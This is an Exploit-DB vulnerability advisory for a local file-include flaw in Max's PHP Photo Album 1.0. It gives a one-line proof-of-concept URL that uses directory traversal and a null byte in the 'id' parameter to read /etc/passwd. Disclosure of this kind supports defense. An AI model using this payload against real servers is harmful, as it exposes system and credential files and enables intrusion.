Max's PHP Photo Album 1.0 - 'id' Parameter Local File Include Vulnerability

2012-03-14T00:00:00
ID EDB-ID:36968
Type exploitdb
Reporter n0tch
Modified 2012-03-14T00:00:00

Description

Max's PHP Photo Album 1.0 'id' Parameter Local File Include Vulnerability. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/52474/info

Max's PHP Photo Album is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker can exploit this vulnerability to view files and execute local scripts in the context of the webserver process. 

http//www.example.com/maximage/showImage.php?id=../../../../../../../../../../../../etc/passwd%00